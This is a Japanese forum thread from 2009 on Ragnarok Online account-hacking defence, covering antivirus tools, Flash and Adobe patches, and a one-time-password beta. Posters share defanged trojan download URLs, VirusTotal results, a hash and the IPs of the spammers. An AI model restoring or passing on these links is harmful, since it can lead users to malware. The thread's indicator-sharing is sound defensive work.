が、IE8だったせいか、フラッシュプレイヤーのActiveXは正常に表示されたが、プラグインが入ってないとか出る。
結果表示の所に、そのソフトの更新方法(というかリンク)が出るのは楽でいい。

取り敢えず、バグレポート出しといたけど、なんかちょっと信用しきれない感じ。ブラウザバージョンやOSのバージョンを
制限するのはどうかと思う。あと、候補にLhaplusが入ってて、そういや、そんな脆弱性もあったっけと懐かしく思い出したわ。 <> (○口○*)さん<>sage<>09/12/02 18:56 ID:G6FiVLA80<> IPA()笑

あそこ職員自らWinnyで情報漏洩やらかしたよね
そんなザル法人の作るものなんて信用できるのかねぇ <> (○口○*)さん<>sage<>09/12/02 19:03 ID:3LmkUaXJ0<> 信用出来ないと思う物は使わなければ良いだけだろ <> (○口○*)さん<>sage<>09/12/02 19:10 ID:OWydbB/10<> 叩けばカッコイイ俺 <> (○口○*)さん<>sage<>09/12/02 19:12 ID:n7n6DTyl0<> >>156
二つプロダクトIDついてくるんじゃなくて、
一つのプロダクトIDで2台使えるけどな

割高で最近微妙なんだよねKIS・・・ <> (○口○*)さん<>sage<>09/12/02 19:51 ID:8bUeCnYu0<> 今AntiVirを買うと、使用期限がさらに1年おまけされます。 <> (○口○*)さん<>sage<>09/12/02 19:57 ID:mzBIos9q0<> >>157
ま、全然ダメだなw <> (○口○*)さん<>sage<>09/12/02 20:12 ID:OrBO/VHX0<> >>158は一を聞いて十を知ることができるらしいから、そもそもツールなんて不要なんだろうな。
まあ、MyJVN関連の開発は日立がやっていることも読めていないようだけど。 <> (○口○*)さん<>sage<>09/12/02 21:53 ID:0WBZ3JEq0<> SecuniaPSIのほうがよさそうだ <> (○口○*)さん<>sage<>09/12/03 14:18 ID:QXniKKED0<> avast!さんが誤検出祭り中らしいですね <> (○口○*)さん<>sage<>09/12/03 15:22 ID:TdP/hk1L0<> 直った模様。 <> (○口○*)さん<>sage<>09/12/04 10:56 ID:FDmxILsQ0<> カスペ先生2010
Win7対応で確かにnProとの衝突度は下がった(ていうか初版が不安定すぎた)
下がったが……ゼロになったわけではない。うちのWinXPでは。
前はROを約3回起動すると4回目起動せずPC再起動も出来ず電源強制OFF
今はROを約6回起動すると7回目起動せずPC再起動も出来ず電源強制OFF
鯖缶多いとマジ涙目
Win7対応では新たに、マップ移動時の暗転時間が目に付くくらい長くなった
8〜9秒くらい。初版ではこんなことなかったんだが…… <> (○口○*)さん<>sage<>09/12/04 23:48 ID:NH8URF+H0<> AVG、ヒューリステックベースのゲーマー向けセキュリティソフト
http://internet.watch.impress.co.jp/docs/news/20091204_333401.html
http://www.avg.co.jp/avg-gaming-protection-p.html

>「AVG Gaming Protection」は、ヒューリステックによるマルウェアの検知を行う。
>バックグランドで実行でき、システムへの負荷を最小限に抑えているほか、
>他のセキュリティ対策ソフトとの併用も可能という。

ふるまい検知のみの代物らしい。対応リストにラグナロクオンラインが入ってる訳だが…nProの振る舞いを検知しない
セキュリティソフトを信用できるのかというと、なんとなく不安。 <> (○口○*)さん<>sage<>09/12/05 00:01 ID:HRpIcxHY0<> nProの動作が既知で、それをワザと回避しているんだから、仮にnProと
同じ動きをするウイルスに感染したら当然スルーされるだろう <> (○口○*)さん<>sage<>09/12/05 02:39 ID:BH4SN8Z90<> Flash Playerに新たな脆弱性、12月8日に修正バージョン公開へ
http://internet.watch.impress.co.jp/docs/news/20091204_333449.html <> (○口○*)さん<>sage<>09/12/05 16:29 ID:0x6/+EP10<> 相変わらずFlashplayerは不具合多いな <> (○口○*)さん<>sage<>09/12/05 16:33 ID:HRpIcxHY0<> 機能を増やしすぎているから、いろいろと穴が残ってしまうんだよ <> (○口○*)さん<>sage<>09/12/05 16:45 ID:ls7PqXzt0<> ユーザーを用意して権限を細かく設定する、っていう風習がなかったから
こうやってセキュリティホールが突かれてコードが実行されてしまうと
為す術が無いんだよなぁ。 <> (○口○*)さん<>sage<>09/12/05 17:10 ID:K6gkv49g0<> ソースチェッカー閉鎖になるみたいだけど後継サイトとかあるのかしら <> (○口○*)さん<>sage<>09/12/05 20:41 ID:BH4SN8Z90<> Gechoエンジンのブラウザなら、view-source:が使えるんじゃないか?
判断は自分でしなきゃならんけど。 <> (○口○*)さん<>sage<>09/12/06 02:14 ID:/78KEjQv0<> WindowsやIEと似たようなもので、Adobe寡占の状況なのも問題を根の深いものにしているな。 <> (○口○*)さん<>sage<>09/12/06 04:47 ID:hBxbD69r0<> Silverlightを使っていただきたい <> (○口○*)さん<>sage<>09/12/07 15:01 ID:ylW6YM6J0<> 初心者質問スレにあったURL

http://www1■uploda■tv/v/uptv0052915■zip

トータルに投げた結果
ttp://www.virustotal.com/jp/analisis/cca2cee33a68b5df7fc30d51357464497adc9b1f3b4a00f54ed4a292cfbaec3c-1260165124

検出率 15/41 (36.59%)

中身はexeファイルだったから早々実行する人はいないとは思うけど微妙に検出率が悪いのが気になる。 <> (○口○*)さん<>sage<>09/12/07 21:33 ID:w6/zZT5h0<> >>179
全く同じアドレスが某鯖Gvwikiにも張られてた
管理人が俺だったので気がついて削除、張ったIPを書き込み禁止リストに追加

ちなみにこれ
OFSfx-05p2-238.ppp11.odn.ad.jp
まあいつもの所だな <> (○口○*)さん<>sage<>09/12/07 22:08 ID:HMzQYrq30<> >>179
見れなくなってた
これで見れるかな
movieplay.exe 18/41 (43.91%)
ttp://www.virustotal.com/jp/analisis/c4c3ec602f8335f0030c3d3af3d71d5e6e7b6b2e7c977fd7d848cee6ebe15394-1260191038

セキュ板提出します <> (○口○*)さん<>sage<>09/12/07 22:34 ID:K4+RpWvF0<> >180
同じく書き込みだが、2ヶ所からあった。

143.90.173.104 OFSfx-06p2-104.ppp11.odn.ad.jp
143.90.181.238 OFSfx-05p2-238.ppp11.odn.ad.jp <> (○口○*)さん<>sage<>09/12/07 23:06 ID:QXkYrCFn0<> >>181
見られなくなってるからハッシュを書いてみたらどうだろう <> (○口○*)さん<>sage<>09/12/07 23:17 ID:HMzQYrq30<> スキャンしなおしてもすでにスキャンされてるYOって言われない
調子悪いみたいだ

virscanにしてみた
ttp://virscan.org/report/1509e26ef23d4056d7783d95dfe86687.html <> (○口○*)さん<>sage<>09/12/09 01:11 ID:VnX/hSi80<> カスペルスキーを使ってますが、
AVGと違ってFWの通知ウィンドウに一時的に遮断する様な項目がありません
何か方法はありますか?

Escキー押すとウィンドウが消えますけど、キャンセルされてるのかな
スレ違いだったらごめんなさい <> (○口○*)さん<>sage<>09/12/09 02:10 ID:f7ozGTJq0<> 【Anti Virus】Kaspersky Lab Part95【カスペルスキー】
http://pc11.2ch.net/test/read.cgi/sec/1259361703/ <> (○口○*)さん<>sage<>09/12/09 05:05 ID:VnX/hSi80<> >>186
誘導有難うございます
とりあえずスレを読んだのですが・・・荒れすぎてて質問どころではなさそうですorz <> (○口○*)さん<>sage<>09/12/09 08:58 ID:n+SNPY3O0<> WindowsUpdate
FlashPlayerは自分で入れること(複数のブラウザを使っている場合はそれぞれに) <> (○口○*)さん<>sage<>09/12/09 09:21 ID:q6paWRxm0<> 一瞬何を言ってるのかと思ったぞ

MSが6件の月例セキュリティ情報を公開、IEやOfficeの脆弱性に対処
ttp://www.itmedia.co.jp/enterprise/articles/0912/09/news015.html

AdobeがFlash Playerのアップデートを予告、Illustratorには脆弱性発覚
ttp://www.itmedia.co.jp/enterprise/articles/0912/04/news019.html
Flash Player 10.0.32.18 → 10.0.42.34
9はアップデート対象はずれた? <> (○口○*)さん<>sage<>09/12/09 16:44 ID:4A81wo+N0<> >>187
2chのセキュリティ板はどのメーカースレも荒れてるけど,空気を読まずに質問すれば
それなりに答えは返ってくる場所…だったと思う。最近見てないけど。 <> (○口○*)さん<>sage<>09/12/09 17:11 ID:q6paWRxm0<> 9はこっちにあったが、更新ラストの可能性がある。
スレチっぽいがアドレスだしとくわ。
ttp://kb2.adobe.com/cps/406/kb406791.html

>>190
たいてい荒らしってのは特定少数で、まともな会話ができる
ROMはスルーしているだけだろうしね。 <> (○口○*)さん<>sage<>09/12/09 21:54 ID:ipcIrLr20<> セキュ板のあれは他社の社員やら信者やらの外部の人間がネガキャンしてるから荒れてるように見えるだけっしょ。
AA貼って嫌がらせとか如実にそう。その状態でもスレに居られるんだから住人に気の短いのは少ないと思うな。
荒らしのレスはただの模様とでも思うのが吉。 <> (○口○*)さん<>sage<>09/12/09 22:07 ID:LdvPnwzx0<> セキュ板とゲハはいつもあんなもんだろw <> (○口○*)さん<>sage<>09/12/09 22:52 ID:U//mDBU+0<> 管理してるWikiにあった書き込み。
多分 >179-183と一緒のもの。

>RO サクライJ グラストヘイム騎士団2Fにおけるロードナイト
>ttp://www1■uploda■tv/v/uptv0053186■zip

中身は「movieplay.exe」(2009/09/29 16:51:00)
EXEのMD5: 068059b42ffe6327d98812d050d488e8

EXEをVTに投げた結果
ttp://www.virustotal.com/analisis/c4c3ec602f8335f0030c3d3af3d71d5e6e7b6b2e7c977fd7d848cee6ebe15394-1260364897

Result: 26/41 (63.42%)
Kaspersky 7.0.0.125 2009.12.09 Trojan.Win32.Inject.alxn

McAfeeがスルーしたが、他の有名処はほぼ検出。 <> 194<>sage<>09/12/09 22:54 ID:U//mDBU+0<> 幸いブロックされてて実害はなかったが、書き込み元IPがちょっと奇妙というか。

218.45.27.92

whoisした結果をググってみたら、中国と韓国に事務所を持つ会社のIPと判明。

更にIPでググったら
>日本VPN代理,VPN代理,??网?科技有限公司_勤加?网?商?
こんな文字が出てくる始末。

VPN串とでも呼ぶんだろうか?
何か結構なIPがリストアップされてたんだが…… <> (○口○*)さん<>sage<>09/12/10 01:20 ID:mkE2dB0n0<> >>193
ゲハはまだID出るからいい
セキュ板は出ない。ゲハ以下 <> (○口○*)さん<>sage<>09/12/10 06:52 ID:gIA8GLXm0<> ID出ればいいってもんでもない <> (○口○*)さん<>sage<>09/12/10 07:53 ID:ieA8yQ6q0<> >>195
可能性は高いね。WikiやBBSのブロック対象にしていいような気がします。
(ブロックしても実害ないだろうし)

ちなみに、会社名称でぐぐったらTOPに横浜支店のmapが(同じ会社かどうかは不明)
こっちも「インターネット不随サービス」とか書いてある。 <> (○口○*)さん<>sage<>09/12/10 13:43 ID:tnIC30u10<> 中国はWikipediaやyoutubeとかもブロックされてるんだっけ?

金盾を回避する為にVPNが用いられてると聞くし、>194-195のIPも元々は
そういう用途の経路だったんじゃないかと予想。
更にVPN経路を提供する商売をやってる所もあるっぽい。 <> (○口○*)さん<>sage<>09/12/10 19:18 ID:NrNrxxHa0<> >>197
あぼーんが楽になる <> (○口○*)さん<>sage<>09/12/10 19:54 ID:yIj946sZ0<> >>199
ネットのVPNだけじゃなくて人間のトンネルもやってそうだな <> (○口○*)さん<>age<>09/12/13 09:59 ID:jT41fS8h0<> 鯖落ち報告スレにあったもの。最近は、日本のあぷろだに置くのが増えてますね。

10 (^ー^*)ノ〜さん 09/12/13 03:41 ID:IijGEe+V0
RO動画 沈没船でアイスを連打する寂しいパラディーンの動画
http://www■dotup■org/uploda/www■dotup■org451445■lzh <> (○口○*)さん<>sage<>09/12/13 10:04 ID:jT41fS8h0<> 他のスレにもあったようで。アドレス一緒。

201 :^乕^*)& ◆dTDczwuaTc :09/12/13 04:12 ID:0RJ4LK5f0
沈没船でアイスを連打する寂しいパラディーンの動画
http://www1■uploda■tv/v/uptv0053452■lzh

9 :& ◆Dm0E77y/9. :09/12/13 04:11 ID:RLPqalYu0
沈没船でアイスを連打する寂しいパラディーンの動画
http://www1■uploda■tv/v/uptv0053452■lzh <> (○口○*)さん<>sage<>09/12/13 10:58 ID:ZX4HkGUP0<> vtなんかには投げてみたの?
ここウイルス収集所ではないから <> (○口○*)さん<>sage<>09/12/13 11:42 ID:jT41fS8h0<> >>204
 >>1読め
 >アカウントハックに関する情報の集積・分析を目的とするスレです。

情報の集積・分析を目的としてますので、情報の集積はスレチじゃないんだけど。

VTに投げろというのは、そうしないとその情報がアカハックであると断定できないと思うから?
ここまで露骨に「過去の事例と類似」しているものを全部投げなくてもとは思います。

自分の使ってるセキュリティソフトで検知できるかどうか他力本願で調べて欲しいということなのかな。
情報の転載する時にそこまで要求されても困りますがな。

11/1に既にVTに引っかかってるようです。直近のデータでは27/41。有名所はちゃんと対応してる様子。
ttp://www.virustotal.com/analisis/e139823f7da97743b476b51e0b477da3423fea17c86d495213a04fabc2369c73-1260664207 <> (○口○*)さん<>sage<>09/12/13 13:05 ID:9z31XaSk0<> >>204は同じことをやってる★持ちにも噛みつけるのかな <> (○口○*)さん<><>09/12/13 15:25 ID:Zr2rpw100<> アカハックどうこうっていう話ではないんですが

使ってないPCがトロイの木馬にかかってたんだけど
ROやる場合は初期化してやったほうがいいですかね?
もうウィルス自体は削除ずみなんですが・・・ <> (○口○*)さん<>sage<>09/12/13 15:40 ID:R1bRLpQ90<> >>207
どんな残骸が残ってるか分からないから俺ならリカバリかけるな <> (○口○*)さん<>sage<>09/12/13 16:11 ID:9z31XaSk0<> ウイルス本体を駆除できていたとしても、windowsシステム自体の深い部分、例えばLSPなどの
構造が壊されていたり書き換えられていて完全には修復出来ていないなどの可能性は十分にあり得る。
その状態で使い続けて他のトラブルを招くケースも考えられるので、リカバリを掛ければ安心感は増す。

最近はEASEUS Todo Backupのような優秀なHDDイメージバックアップソフトがフリーで提供されていたりするので、
必要な設定とセキュリティアップデートを済ませた段階でイメージを保存しておくと、次からの手間がぐんと減らせるよ。 <> (○口○*)さん<>sage<>09/12/13 16:19 ID:Zr2rpw100<> >>208,209
あざりがとうございます
早速リカバリーかけてきます <> (○口○*)さん<>sage<>09/12/13 17:17 ID:1UPvfAcZ0<> >>205
コピペだけで埋まったら意味が無くなるから言ったんだが
どんなウイルスかは自分で調べれってか <> (○口○*)さん<>sage<>09/12/13 17:38 ID:3MJVNul30<> 危険URLの報告する人はVTの結果まで付けろ、なんてルール
今まで一度も出てないけどな
いくら圧縮ファイルとはいえ、手違いで感染する事だって有り得るし
検体をDLしてVTに投げてから報告しろ、なんて横暴すぎるだろ

あくまでも報告は善意のものだし、VTのチェック結果を付けるのも
その流れで善意のもの

報告する時の義務じゃない <> (○口○*)さん<>sage<>09/12/13 18:43 ID:ZDlZ/4T+0<> 文やURLとか、何処のロダつかっててそこの何番はヤバイかとか判るだけでも有用 <> (○口○*)さん<>sage<>09/12/13 18:43 ID:jT41fS8h0<> >>211
ウイルスの検出名まで報告しなくても、現在進行形で行われている「手口または手法」に関する情報としては
アドレスとコメントを引用するだけで十分だと思ったんだけど、違うかな? <> (○口○*)さん<>sage<>09/12/13 18:47 ID:wQl5P68A0<> いつも難癖だけ付ける奴だろ放置しろよ <> (○口○*)さん<>sage<>09/12/13 20:05 ID:5doyRucY0<> じゃあ俺も善意でよくわからないアドレスの鑑定依頼しますね <> (○口○*)さん<>sage<>09/12/13 21:06 ID:Q0SsHia60<> >>216
>>1
>■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■ <> (○口○*)さん<><>09/12/14 00:03 ID:iINFhWo+0<> アカハックと思われるURL http://jmp2■net/nZ4 を数時間前に誤って踏んでしまいました。
ウイルススキャンやソースチェックも行い特に結果も出なかったのですが、アカハックとは無関係なのでしょうか? <> (○口○*)さん<>sage<>09/12/14 00:20 ID:EiCjYTbR0<> >>203
よく見たらlzhって珍しいような
人によっては展開できない可能性があるよね <> (○口○*)さん<>sage<>09/12/14 01:03 ID:4FllIx1X0<> >>219
URLの拡張子っぽい部分がlzhだからって受信データがlzhだとは限らないけど、確認した? <> (○口○*)さん<>sage<>09/12/14 01:42 ID:yh03m/sa0<> 拡張子を無視するような設定のブラウザを使っている方が間抜け <> (○口○*)さん<>sage<>09/12/14 16:27 ID:fNmFNXCQ0<> Content-Typeで判断してるんだが知らないんだろうな <> (○口○*)さん<>sage<>09/12/14 21:11 ID:LeAVQRro0<> 例によって初心者スレに張られたURL
RO 7thアニバーサリー新装備の使用感
http://akto3312■page2■jp/test/

アーガスで見たところ
ttp://www.aguse.jp/?m=w&url=http%3A%2F%2Fakto3312.page2.jp%2Ftest%2F&retry.x=62&retry.y=6

Trojan.Win32.Inject.alxnを仕込んでいる模様。 <> (○口○*)さん<>sage<>09/12/14 21:35 ID:B6C310jT0<> >>222
世の中にはそのContent-Typeヘッダを無視するブラウザがありまして <> (○口○*)さん<>sage<>09/12/14 22:15 ID:iTo8IFWa0<> >>224
あのブラウザ以外は間抜けだと言うなら、俺は間抜けでいいや <> (○口○*)さん<>sage<>09/12/14 22:22 ID:DyiFqUko0<> そもそもURLだけでファイルを判断するのが間違い

URLとダウンロードされるファイル名は別物
さらにファイル名と実際のファイルの中身も別物
Content-Typeだっていくらでも偽装できるぞ <> (○口○*)さん<>sage<>09/12/14 22:31 ID:EiCjYTbR0<> 本拠地ならともかく他人のうpろだでも偽装できるの?

中身は1ヶ月前に解析済みだった
http://www.virustotal.com/jp/analisis/6de61ac7381516044603c24512e12e25f62abb5ebefba2b3dc63db03bdb0766b-1258024836
今の結果はこれ
http://www.virustotal.com/jp/analisis/6de61ac7381516044603c24512e12e25f62abb5ebefba2b3dc63db03bdb0766b-1260797252 <> (○口○*)さん<>sage<>09/12/14 22:35 ID:EiCjYTbR0<> ああ、IEならよそさまのサーバでも可能か
めんごめんご <> (○口○*)さん<>sage<>09/12/14 23:25 ID:TJr1anTp0<> あちこちのwikiに>>223の使用感+URLが貼られてた
爆撃書き込みor新規ページ作成でうっとうしい… <> (○口○*)さん<>sage<>09/12/15 00:22 ID:hRQb89vW0<> IE8ではContent sniffing周りの挙動も改善されているし、サーバ側でX-Content-Type-Options: nosniffを
追加してやればW3Cに近い動作となる。
まあ、IE7以下は使わないのが無難だわな。 <> (○口○*)さん<>sage<>09/12/15 00:25 ID:hRQb89vW0<> >>219,220
今ではwindows標準で処理できるzipと違って、lzhはMIME未登録である可能性を取り得るので
攻撃対象として使いやすいのだろうね。 <> (○口○*)さん<>sage<>09/12/15 00:56 ID:KyG0zhlg0<> 昔はlzh結構あったよなあ <> (○口○*)さん<>sage<>09/12/15 01:04 ID:ofYQnYuZ0<> 国内の圧縮形式はlzhが主流だったね
海外のサイトだとzipが多かったらしい
象さんとか使ってたり、dll用意しないと解凍できなかった時代だw

zipがそのまま開ける時代が来るなんて思ってなかったわ <> (○口○*)さん<>sage<>09/12/15 01:07 ID:DCMwM8yL0<> dll以前、MS-DOSの頃から続いたものだしね。
不思議なことに、LHA形式は廃れかけながらも消えないで残っている。 <> (○口○*)さん<>sage<>09/12/15 01:14 ID:hRQb89vW0<> LHarc→LHAは処理速度と圧縮率のバランスが優れていたからね。
あとは、当時のPKZipはシェアウェアだったことと、pkzip/pkunzipといった感じに圧縮と展開が別のバイナリに
分かれていて繁雑だったのもあるか。 <> (○口○*)さん<>sage<>09/12/15 03:46 ID:lK6dHzaE0<> 毎度お騒がせ野郎の到来。

ROたれモロクの現身(人間型)で致命的な傷
http://liveyoulive■cafemix■jp/dj00091204/

REMOTE_ADDR: 112.140.36.168

既出の>>223の時のIPは202.90.191.24。

ODN弾きとかBBQ規制とかを回避しようと色々やっているっぽいね。 <> (○口○*)さん<>sage<>09/12/15 03:56 ID:hRQb89vW0<> >>236乙です。
どうやら連中も、踏み台を中継鯖からクラウド経由にシフトしつつある感じですね。 <> (○口○*)さん<>sage<>09/12/15 09:04 ID:ecfT6ESF0<> >>218
>219をよく見ようか

アカハックと思われる理由とかなしにそれ貼っても回答貰えないと思いますよ。

転送アドレスのようですから、実際の飛び先確認して、飛び先になにがあるか確認して…と手間かかるのに
相談用のテンプレを埋めもせず、アカハックとは無関係かと聞かれたら、回答放棄したくなります。 <> (○口○*)さん<>sage<>09/12/15 09:26 ID:RLvtPVjo0<> 今さらだけどおまえらFLASH更新しとけよ <> (○口○*)さん<>sage<>09/12/15 10:49 ID:ecfT6ESF0<> >>239
>171
俺はもうやったよ。家の他のPCも全部更新した。

そして、自分のPCは昨日OS入れなおしたばっかり。orz
せっかく更新したんだけどねぇ。 <> (○口○*)さん<>sage<>09/12/15 11:16 ID:rGYpIy8u0<> ttp://blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html
Adobe(Acrobat)Readerに新たな脆弱性 <> (○口○*)さん<>sage<>09/12/15 15:14 ID:wZ9Igjqf0<> ワンタイムパスベータテスト実行されましたので、告知を貼ります。
現状はdocomo携帯で使用可能。
後、アプリをダウンロードする必要があります。

http://www.ragnarokonline.jp/news/information/notice/item/13370

「携帯アプリ型ワンタイムパスワード」ベータテスト開始!
[2009/12/15]

ラグナロクオンライン運営チームです。

2009年12月15日(火)15:00より、「SecureOTP Mobile」を利用した
「携帯アプリ型ワンタイムパスワード」のベータテストを、
「ガンホーゲームズ」にて開始いたしました。

▼ベータテスト期間
2009年12月15日(火)15:00〜

▼利用料金
ベータテスト期間中は無料でご利用いただけます

ワンタイムパスワードは、利用ごとに生成されるパスワードで認証する非常に堅牢で
信頼性の高いセキュリティ技術なため、多くの金融機関でも採用されております。
しかも、利便性の高い携帯アプリを使用した「ワンタイムパスワード」の導入は、
国内オンラインゲーム業界初となっております。

詳細はこちら

皆様の大切なゲーム資産を守るためにも、ぜひこの機会に「ワンタイムパスワード」をお試しください。

本日から実施しているベータテストは、NTTドコモの携帯電話のみ先行でご利用いただけます。
※SoftBankモバイル、auの携帯電話向けにも、今冬中にサービスを開始する予定です。
※スマートフォン、iPhoneは対応しておりません。 <> (○口○*)さん<>sage<>09/12/15 15:38 ID:/bk+K1Yc0<> >ゲーム資産
初乗り(?)だけあってやる気あるな <> (○口○*)さん<>sage<>09/12/15 16:04 ID:t9RVGhP50<> βテスト期間中は無料、って事は将来的にこれはオプション選択式有料サービス
的な扱いになるのかな
きになるのは「値段がどのくらいのサービスになるか」と「対応機種」の2項目
位だろうか

と思って調べて見たら対応機種表があった
ttp://www.thirdnetworks.co.jp/OTPMobile/pdf/docomo.pdf
これを見ると901系全滅、902はD902iSのみな状態
N902iSな俺様涙目 <> (○口○*)さん<>sage<>09/12/15 16:09 ID:OdkDa0oN0<> こっちにも投げとこう
↑のPDFから、現時点での対応リスト

D705i
D902iS,D903i,D903iTV,D904i,D905i

F-01A,F-01B,F-02A,F-02B,F-03A,F-04A,F-05A,F-06A,F-08A,F-09A,F-10A
F703i,F704i,F705i,F706i,
F801i,F884i,F884iES,
F903i,F903iBSC,F903iX,F904i,F905i,F905iBiz,F906i

L-04A,L-06A

N-01A,N-02A,N-03A,N-04A,N-05A,N-06A,N-07A,N-08A,N-09A
N705i,N705iμ,N706i,N706iU,N706ie,
N904i,N905i,N905iBiz,N905iμ,N906i,N906iL,N906iμ

P-01A,P-01B,P-02A,P-03A,P-04A,P-05A,P-06A,P-07A,P-08A,P-09A,P-10A
P705i,P705iCL,P705iμ,P706ie,P706iμ,
P904i,P905i,P905iTV,P906i

SH-01A,SH-01B,SH-02A,SH-02B,SH-03A,SH-04A,SH-05A,SH-06A,SH-07A,SH-08A
SH704i,SH705i,SH705iII,SH706i,SH706ie,SH706iw,
SH903i,SH903iTV,SH904i,SH905i,SH905iTV,SH906i,SH906iTV

SO703i,SO704i,SO705i,SO706i,
SO903i,SO903iTV,SO905i,SO905iCS,SO906i <> (○口○*)さん<>sage<>09/12/15 16:19 ID:t9RVGhP50<> >>245
まとめ乙です
こうしてみると903系もメーカーに寄ってはだめっぽいなあ
何かさっさと機種変更しろと言われてるみたいで萎える… <> (○口○*)さん<>sage<>09/12/15 16:29 ID:/bk+K1Yc0<> これはiアプリの機能か何かの絡みなのか?
Dは902から入ってるなあ。 <> (○口○*)さん<>sage<>09/12/15 17:13 ID:xZSjTQHJ0<> ログインツールが使えない
なんかまた変更あったのか・・・ <> (○口○*)さん<>sage<>09/12/15 17:17 ID:F4zoG4cG0<> >>247
個人的には、メーカーが修理できるかどうかだけのような気がするけど <> (○口○*)さん<>sage<>09/12/15 18:09 ID:roMYJiTm0<> なんで将来的にユーザーから金取るみたいな告知なの?
アカハクがここまで広まったのは、癌の対応が遅かったからだろ
nProだって利用料金取って無いんだし、このシステムにかかる金も癌で負担しろ <> (○口○*)さん<>sage<>09/12/15 18:34 ID:ecfT6ESF0<> >>248
セキュリティというよりはRO環境な気もするけど、居場所なさそうだね。 <> (○口○*)さん<>sage<>09/12/15 18:40 ID:DqpYFOh40<> なんかワールドグループ選択までできるが
ワールドを選ぶとすぐ終了するんだがだれか解決方法しらない? <> (○口○*)さん<>sage<>09/12/15 18:43 ID:eyblyNAY0<> >>252
>>2 <> (○口○*)さん<>sage<>09/12/15 18:53 ID:DqpYFOh40<> >>253
すまねえ
ここアカウントハック対策スレだったんだな

一度質問スレでログインの問題について調べてみる <> (○口○*)さん<>sage<>09/12/15 20:02 ID:7RFr5dye0<> アカハクとなんも関係ないんだけどメンテ後からロジクールのキーボードG15の
時計とか表示されてるモニタがRO起動中だけ動かなくなった俺だけ? <> (○口○*)さん<>sage<>09/12/15 20:28 ID:ecfT6ESF0<> nProがWin7(32bit)にも対応したから、その影響で変化したんだろ <> (○口○*)さん<>sage<>09/12/15 21:56 ID:3KN7p5ff0<> ソースチェッカーさんによると問題なさそうなんだけど、ちょっと不安なんで質問。
パッチ当ててからなんだけど、PG2がRO起動のたびにkoreaをブロックし始めたんだけど俺だけ?
ちなみに送信先 211.233.45.45:8080
問題なさそうなら許可しちゃってOKかな? <> (○口○*)さん<>sage<>09/12/15 22:01 ID:9B2zovjb0<> IPv4 Address : 211.233.45.0-211.233.45.255
Network Name : KIDC-INFRA
Connect ISP Name : KIDC

[ Organization Information ]
Organization ID : ORG137200
Org Name : LG DACOM KIDC

なんでそんなとこに行くんだかしらん <> 257<>sage<>09/12/15 22:19 ID:3KN7p5ff0<> ごめんなさい、テンプレ忘れてました。

【      気付いた日時          】  2009/12/15 20時頃
【不審なアドレスのクリックの有無 】  ほとんどRO専用PCなので、無いと思います。
【他人にID/Passを教えた事の有無】 NO
【他人が貴方のPCを使う可能性の有無】  NO
【    ツールの使用の有無      】  NO
【  ネットカフェの利用の有無    】  NO
【     OS    】 WindowsXP Home Edition Version2002 Service Pack 3
【使用ブラウザ 】 Internet Explorer 8 バージョン : 8.0.6001.18702
            Firefox バージョン : 3.5.5
【WindowsUpdateの有無】 2009/12/9
【 アンチウイルスソフト 】 カスペルスキー インターネットセキュリティ 8.0.0.454
【その他のSecurty対策 】  ルータ有 Spybot S&D BitDefenderコマンドライン版
【 ウイルススキャン結果】  異常なし
【スレログやテンプレを読んだか】  YES
【hostsファイルの変更】 有 リスト:ROアカハック対策スレのhostsファイルまとめ臨時 ・ BS-Template Srcurity ・ リネージュ資料室
【PeerGuardian2の導入】 有 リスト:ROアカハック対策スレのhostsファイルまとめ臨時 ・ BS-Template Srcurity ・ リネージュ資料室
【説明】
2009/12/15のパッチ以降、ROを起動するとPG2が 送信先 211.233.45.45:8080 をブロックするようになりました。
リストは、リネージュ資料室さんの 韓国 が該当しているようです。
昨夜は無かったので、今回のパッチが当たってからだと思います。
ソースチェッカーでは問題が無いようなのですが、不安なので質問させていただきました。
質問は、
・この症状は私だけなのでしょうか。
・これは許可してしまっても問題ないのでしょうか。
よろしくお願いします。 <> (○口○*)さん<>sage<>09/12/15 23:01 ID:7TwVJTI/0<> >>257
それはnProが改変されていないか整合性チェックをするための通信
遮断してても正常に起動するんだけど、許可すると起動が少し速くなるはず

なので好きな方を選べ <> 257<>sage<>09/12/15 23:07 ID:3KN7p5ff0<> >258
>260
許可して使うことにします。
ありがとうございました。 <> まとめ臨時
◆kJfhJwdLoM<>sage<>09/12/15 23:10 ID:+IIOOqNP0<> 当方も起動時に>>257さんの言われる
211■233■43■45:8080のブロックを確認しました。
今回の更新で目に見えた追加と言うと
ワンタイムパスワードぐらいなので、この関連なのかなーとか…。
ブロックしたままでもゲームは起動するので、とりあえず様子見。

それとRO起動時に
WindowsDefenderでC:\WINDOWS\system32\GameMon.desのサービス変更反応。
nProtect Game Monitor Rev 1425と説明文、バージョン2009.12.3.1
これが>>256さんの言うWin7の32bit対応なのかも。 <> まとめ臨時
◆kJfhJwdLoM<>sage<>09/12/15 23:13 ID:+IIOOqNP0<> >>260 nPro関連だったのですね。ありがとうございました。 <> (○口○*)さん<>sage<>09/12/16 09:13 ID:M8XP2C830<> ttp://popleff11■blog■shinobi■jp/

Loki攻城戦板に書かれていたURL。
4gamerankingへのiframeあり。 <> (○口○*)さん<>sage<>09/12/16 17:29 ID:r8gt94Qf0<> Firefoxバージョン 3.5.6 - 2009/12/15 リリース きてます <> (○口○*)さん<>sage<>09/12/16 17:44 ID:4VjwX2vU0<> あちゃ……AdobeReader9.2にゼロデイ脆弱性か……
ttp://internet.watch.impress.co.jp/docs/news/20091216_336182.html <> (○口○*)さん<>sage<>09/12/17 00:03 ID:izxYScn60<> 福建中華もあちらで病毒専用ドメイン、サイトを持ちにくくなるかな?

【中国】インターネット上のサイト、個人の所有認めず 「文革当時の抑圧も同然」と一部で反発も
ttp://www.2nn.jp/news4plus/1260966148/

-----ここから
今後、中国では個人がインターネットのサイトを所有できなくなる。
(中略)
ブログなど個人が運営するサイトは、以前のインターネットポータルやビジネス向けのサイトでのみ
可能だということだ。すでに開設されている個人のサイトは段階的に閉鎖される。
-----ここまで
記事だと現に遮断されてる個人のドメインがあるようだから奴等の残存ドメイン群も例外ではないと思われる。
ここのところの日本のフリーサービス多用はこれを察知してのことかも知れぬ。

再び大規模サイト改竄に走る恐れもあるし、気をつけてくれよな! <> (○口○*)さん<>sage<>09/12/17 00:03 ID:g0ZBH5hd0<> 海外に逃げればいくらでも手はあるしな <> (○口○*)さん<>sage<>09/12/17 00:07 ID:B1GbgiXl0<> ところがこういう動きもあってだな

CNNICによる.cnドメイン登録審査の見直し
